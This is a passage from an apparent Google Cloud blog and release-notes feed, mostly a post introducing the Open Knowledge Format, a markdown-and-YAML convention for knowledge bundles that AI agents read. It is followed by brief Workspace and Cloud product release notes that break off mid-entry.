&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;That’s why today, we’re introducing the Open Knowledge Format (OKF), an open specification that formalizes the &lt;a href="https://gist.github.com/karpathy/442a6bf555914893e9891c11519de94f" rel="noopener" target="_blank"&gt;LLM-wiki&lt;/a&gt; pattern into a portable, interoperable format. This is a vendor-neutral, agent- and human-friendly standard for representing the metadata, context, and curated knowledge that modern AI systems need.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As published, &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;OKF v0.1&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; represents knowledge as a directory of markdown files with YAML frontmatter, with a small set of agreed-upon conventions that let wikis written by different producers be consumed by different agents without translation.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;That's it. No complex compression scheme, no new runtime, no required SDK. A bundle of OKF documents is:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Just markdown&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; — readable in any editor, renderable on GitHub, indexable by any search tool&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Just files&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; — shippable as a tarball, hostable in any git repo, mountable on any filesystem&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Just YAML frontmatter&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; — for the small set of structured fields that need to be queryable: &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;type&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;title&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;description&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;resource&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;tags&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, and &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;timestamp&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If you've used Obsidian, Notion, Hugo, or any of the LLM wiki patterns that have emerged over the past year, the shape will feel familiar. OKF formalizes the small set of conventions needed to make these patterns interoperable.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Let’s take a look at the problem that OKF can solve for your organization, how it works, how to get started with it, and what’s next.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;A fragmented context landscape&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In most organizations, the information that foundation models use is overwhelmingly internal knowledge: the schema of a table, your business’ meaning of a metric, the runbook for an incident, the join paths between two systems, the deprecation notice for an old API, etc.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Today, these atoms of knowledge live in a variety of highly fragmented systems:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Metadata catalogs with their own APIs&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Wikis, third-party systems, or in shared drives&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Code comments, docstrings, or notebook cells&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The heads of a few senior engineers&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When an AI agent needs to answer &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;"How do I compute weekly active users from our event stream?"&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; it has to assemble the answer from these scattered, mutually incompatible surfaces. Every vendor offers its own catalog, its own SDK, its own knowledge-graph schema, and none of the knowledge is easily portable across products or organizations.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The result: Every agent builder is solving the same context-assembly problem from scratch, every catalog vendor is reinventing the same data models, and the knowledge itself is locked behind whichever surface created it.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Knowledge as a living wiki&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Developer teams are changing how they build AI agents. Instead of using models to search the same documents for the same facts over and over, you can give your agents a shared markdown library that grows more useful over time. This lets your agents take on the drudgery of reading and updating their own files, while your team curates the content and manages it like code. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Andrej Karpathy, the prominent AI researcher and educator, articulates this idea most crisply in his &lt;/span&gt;&lt;a href="https://gist.github.com/karpathy/442a6bf555914893e9891c11519de94f" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;LLM Wiki gist&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. "LLMs don't get bored, don't forget to update a cross-reference, and can touch 15 files in one pass," he writes. The bookkeeping that causes humans to abandon personal wikis is exactly what LLMs are good at.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Similar knowledge-as-Wiki pattern keeps reappearing under different names: &lt;/span&gt;&lt;a href="https://obsidian.md/help/vault" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Obsidian vaults&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; wired to coding agents, the &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;AGENTS.md&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; / &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;CLAUDE.md&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; family of convention files, repos full of &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;index.md&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;log.md&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; artifacts that agents consult before doing real work, and "metadata as code" repositories inside data teams. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The pattern is compelling and powerful, but each instance is bespoke. Karpathy's wiki and your team's wiki and a vendor's catalog export may all &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;look&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; alike (markdown, frontmatter, cross-links), but none of them are intentionally designed to cooperate. There is no agreed-upon answer to &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;what fields every document should carry&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, or &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;what filenames mean what&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;. As a result, the knowledge encoded in wikis remains siloed within the original teams, leading to redundant effort whenever a new agent is built.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;What's missing is a format, not another service&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The answer to this problem isn’t another knowledge service. You need a &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;format&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, a way to represent knowledge that:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Anyone can produce, without an SDK&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Anyone can consume, without an integration&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Survives moving between systems, organizations, and tools&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Lives in version control alongside the code it describes&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Is readable by humans &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;and&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; parseable by agents: the same file, no translation layer&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By design, OKF is that format. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;How OKF works: The design in one screen&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;An OKF &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;bundle&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; is a directory of markdown files representing &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;concepts: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;anything you want to capture, including tables, datasets, metrics, playbooks, runbooks, and APIs. Each concept is one file. The file path is the concept's identity:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;sales/\r\n├── index.md\r\n├── datasets/\r\n│   ├── index.md\r\n│   └── orders_db.md\r\n├── tables/\r\n│   ├── index.md\r\n│   ├── orders.md\r\n│   └── customers.md\r\n└── metrics/\r\n│   ├── index.md\r\n     └── weekly_active_users.md&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fb8be70dfa0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Each concept document has a small block of YAML front matter for structured fields and a markdown body for everything else:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;---\r\ntype: BigQuery Table\r\ntitle: Orders\r\ndescription: One row per completed customer order.\r\nresource: https://console.cloud.google.com/bigquery?p=acme&amp;amp;d=sales&amp;amp;t=orders\r\ntags: [sales, revenue]\r\ntimestamp: 2026-05-28T14:30:00Z\r\n---\r\n\r\n# Schema\r\n\r\n| Column        | Type      | Description                              |\r\n|---------------|-----------|------------------------------------------|\r\n| `order_id`    | STRING    | Globally unique order identifier.        |\r\n| `customer_id` | STRING    | FK to [customers](/tables/customers.md). |\r\n\r\n# Joins\r\n\r\nJoined with [customers](/tables/customers.md) on `customer_id`.&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fb8be70d4c0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Concepts link to each other with normal markdown links, turning the directory into a &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;graph&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; of relationships that is richer than the parent/child links implied by the file system. Bundles can optionally include &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;index.md&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; files (for progressive disclosure as agents navigate the hierarchy) and &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;log.md&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; files (for chronological history of changes).&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The full v0.1 specification (including conformance criteria, cross-linking rules, and the small number of reserved filenames) fits on a single page.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Three principles behind the design&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;1. Minimally opinionated.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; OKF requires exactly one thing of every concept: a &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;type&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; field. Everything else (e.g., what types exist, what other fields to include, what sections the body has) is left to the producer. The spec defines the &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;interoperability surface&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, not the content model.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;2. Producer/consumer independence.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; OKF cleanly separates &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;who writes the knowledge&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; from &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;who consumes it&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;. A bundle hand-authored by a human can be consumed by an AI agent. A bundle generated by a metadata export pipeline can be browsed in a visualizer. A bundle synthesized by one LLM can be queried by another. The format is the contract; the tooling at each end is independently swappable.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;3. Format, not platform.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; OKF is not tied to any specific cloud, database, model provider, or agent framework. It will never require a proprietary account or SDK to read, write, or serve. We're publishing it as an open standard because the value of a knowledge format comes from how many parties speak it, not from who owns it.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;What we're shipping with the spec&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To make the format concrete, we're publishing &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;reference implementations&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; at both the producer and consumer ends:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;An &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;enrichment agent&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; that walks a BigQuery dataset, drafts an OKF concept document for every table and view, then runs a second LLM pass that crawls authoritative documentation and enriches each concept with citations, schemas, and join paths.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;A &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;static HTML visualizer&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; that turns any OKF bundle into an interactive graph view in a single self-contained file; no backend, no install on the viewing side, no data leaves the page.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Three ready-to-browse sample bundles&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: &lt;/span&gt;&lt;a href="https://developers.google.com/analytics/bigquery/web-ecommerce-demo-dataset" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;GA4 e-commerce&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://pantheon.corp.google.com/marketplace/product/stack-exchange/stack-overflow?e=PanGm2themeLaunch::PanGm2themeEnabled,PanGm2themeDarkLaunch::PanGm2themeDarkControl&amp;amp;mods=pan_ng2&amp;amp;project=hormati-bqml" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Stack Overflow&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/public-datasets/bitcoin-in-bigquery-blockchain-analytics-on-public-data?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Bitcoin public datasets&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, produced by the reference agent and committed to the repo as living examples of conformant OKF.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;These are proofs of concept, deliberately. The agent demonstrates &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;one&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; way to produce OKF; nothing about the format requires a specific agent framework or LLM. The visualizer demonstrates &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;one&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; way to consume it; nothing about the format requires HTML or a graph view. We expect (and want!) the ecosystem of producers and consumers to grow far beyond what we've shipped.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Where we go from here&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;OKF v0.1 is a starting point, not a finished standard. The format will evolve as more producers and consumers emerge and as we collectively learn what knowledge representations agents actually need in practice.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We're publishing in the open from day one because that's the only way a knowledge format earns its name, whether you're building a knowledge catalog, an enrichment pipeline, a wiki tailored to AI agents, or anything in the AI knowledge domain. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;From here, we encourage you to:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Read the spec&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; (it's short!)&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Write a producer&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; for your source system, your database, your documentation site&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Write a consumer:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; a viewer, a search index, an agent that reasons over bundles&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Try the reference implementation&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; against your own data&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;File issues, send PRs, or propose extensions:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The spec is versioned and explicitly designed for backward-compatible growth&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The repo, the spec, and the sample bundles are available in &lt;/span&gt;&lt;a href="https://github.com/GoogleCloudPlatform/knowledge-catalog/tree/main/okf" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;GitHub&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. We have also updated Google Cloud’s &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/data-analytics/introducing-the-google-cloud-knowledge-catalog"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Knowledge Catalog&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to be able to ingest Open Knowledge Format and serve it to our agents. You can find the relevant code and examples &lt;/span&gt;&lt;a href="https://github.com/GoogleCloudPlatform/knowledge-catalog/tree/main/toolbox/mdcode/demo" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The format itself is the contribution. The tools we've shipped exist to make it real, and to lower the cost of trying it out. Whatever shape your knowledge takes today, OKF is designed to be the &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;lingua franca&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; it can be exchanged for tomorrow. &lt;/span&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;p&gt;&lt;sup&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;Published by the Google Cloud Data Cloud team. Open Knowledge Format is an open specification; contributions, alternative implementations, and adoption beyond Google products are all explicitly welcomed.&lt;/span&gt;&lt;/sup&gt;&lt;/p&gt;
&lt;p&gt;&lt;sup&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;In addition to the authors, this work came together thanks to key ideas from many others at Google, and we thank them for their contributions.&lt;/span&gt;&lt;/sup&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/data-analytics/how-the-open-knowledge-format-can-improve-data-sharing/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-12T13:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/innovation-and-ai/technology/safety-security/combatting-ai-scams/</id>
    <title>How we're combatting AI scams with security, legislation and more</title>
    <updated>2026-06-12T09:00:00+00:00</updated>
    <content type="html">Illustration of a white G in a blue shield surrounded by safety and security-related images</content>
    <link href="https://blog.google/innovation-and-ai/technology/safety-security/combatting-ai-scams/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-12T09:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://developers.google.com/workspace/release-notes#June_12_2026</id>
    <title>Workspace Release Notes — June 12, 2026</title>
    <updated>2026-06-12T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Chat API&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Generally Available:&lt;/strong&gt; You can now quote messages from other spaces, or quote message replies from different threads in the same space. To do this, set the &lt;code&gt;quoteType&lt;/code&gt; (REST) or &lt;code&gt;quote_type&lt;/code&gt; (gRPC) field to &lt;code&gt;FORWARD&lt;/code&gt; in &lt;code&gt;QuotedMessageMetadata&lt;/code&gt; when creating a message.&lt;/p&gt;
&lt;p&gt;For more information, see &lt;a href="https://developers.google.com/workspace/chat/create-messages#quote-a-message"&gt;Quote a message&lt;/a&gt;.&lt;/p&gt;</content>
    <link href="https://developers.google.com/workspace/release-notes#June_12_2026" rel="alternate"/>
    <category term="Workspace Release Notes"/>
    <published>2026-06-12T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#June_12_2026</id>
    <title>Cloud Release Notes — June 12, 2026</title>
    <updated>2026-06-12T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;BigQuery&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/generative-ai-overview"&gt;BigQuery AI functions&lt;/a&gt; can use
&lt;a href="https://docs.cloud.google.com/bigquery/docs/work-with-objectref"&gt;&lt;code&gt;ObjectRef&lt;/code&gt; values&lt;/a&gt; directly as input,
without calling the &lt;code&gt;OBJ.GET_ACCESS_URL&lt;/code&gt; function.
This feature is
&lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;generally available&lt;/a&gt;
(GA).&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Cloud Monitoring&lt;/h2&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;All &lt;code&gt;agent.googleapis.com/processes&lt;/code&gt; metrics are retained for 24 months. For
more information, see &lt;a href="https://docs.cloud.google.com/monitoring/quotas#data_retention_policy"&gt;Data retention&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Cloud SQL for PostgreSQL&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;You can now create and query &lt;a href="https://docs.cloud.google.com/sql/docs/postgres/parameterized-secure-views"&gt;parameterized secure views&lt;/a&gt;
in Cloud SQL for PostgreSQL.&lt;/p&gt;
&lt;p&gt;Parameterized secure views let you use PostgreSQL views with more granular
access control over your data. While you can issue a &lt;code&gt;GRANT&lt;/code&gt; statement to control
whether a user can query a PostgreSQL view, a &lt;code&gt;GRANT&lt;/code&gt; statement doesn't let you
control the data that the view returns based on the user who is making the
query.&lt;/p&gt;
&lt;p&gt;To gain this level of control, use parameterized secure views. You can
define parameters such as a user ID or region within the view. When your
application queries the view, a user can provide values for these parameters,
which customizes the query results. Using parameterized secure views lets you
enforce "least privilege" access to help ensure that your users interact only
with the data that is relevant and authorized to them.&lt;/p&gt;
&lt;p&gt;This feature is in &lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;Preview&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Cloud Service Mesh&lt;/h2&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;The following images are now rolling out for managed Cloud Service Mesh:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Sidecar version 1.21.6-asm.36, is rolling out to the rapid release channel.&lt;/li&gt;
&lt;li&gt;Sidecar version 1.20.8-asm.86 is rolling out to the regular release channel.&lt;/li&gt;
&lt;li&gt;Sidecar version 1.19.10-asm.76 is rolling out to the stable release channel.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These rollouts will preempt those &lt;a href="#June_03_2026"&gt;previously announced on June 3, 2026&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;These patch releases contain the fix for the vulnerability listed in
&lt;a href="https://docs.cloud.google.com/service-mesh/docs/security-bulletins#gcp-2026-035"&gt;GCP-2026-035&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Proxy version csm_mesh_proxy.20260423_RC03 for Gateway API on GKE clusters is
rolling out to all Managed Cloud Service Mesh release channels over the next
week.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Gemini Enterprise&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Gemini Enterprise mobile app: General availability (GA) for Google Identity users&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The Gemini Enterprise mobile app is generally available (GA) for organizations using Google Identity as their identity provider. Users can access their agents, search enterprise data, utilize voice features, and perform interactive actions from iOS and Android devices.&lt;/p&gt;
&lt;p&gt;With this release, administrators can display a configuration QR code on the web app homepage to enable user access by scanning the QR code. For organizations using Microsoft Entra ID, access to the mobile app is in GA with allowlist.&lt;/p&gt;
&lt;p&gt;To learn more, see &lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/configure-mobile-app"&gt;Configure the mobile app&lt;/a&gt; and &lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/use-the-mobile-app"&gt;Use the mobile app&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Google Cloud Contact Center as a Service&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Google Cloud CCaaS 4.40&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;We've released version 4.40 of Google Cloud CCaaS.&lt;/p&gt;
&lt;p&gt;The timing of the update to your instance depends on the deployment schedule
that you have chosen. For more information, see &lt;a href="https://cloud.google.com/contact-center/ccai-platform/docs/deployment-schedules"&gt;Deployment
schedules&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
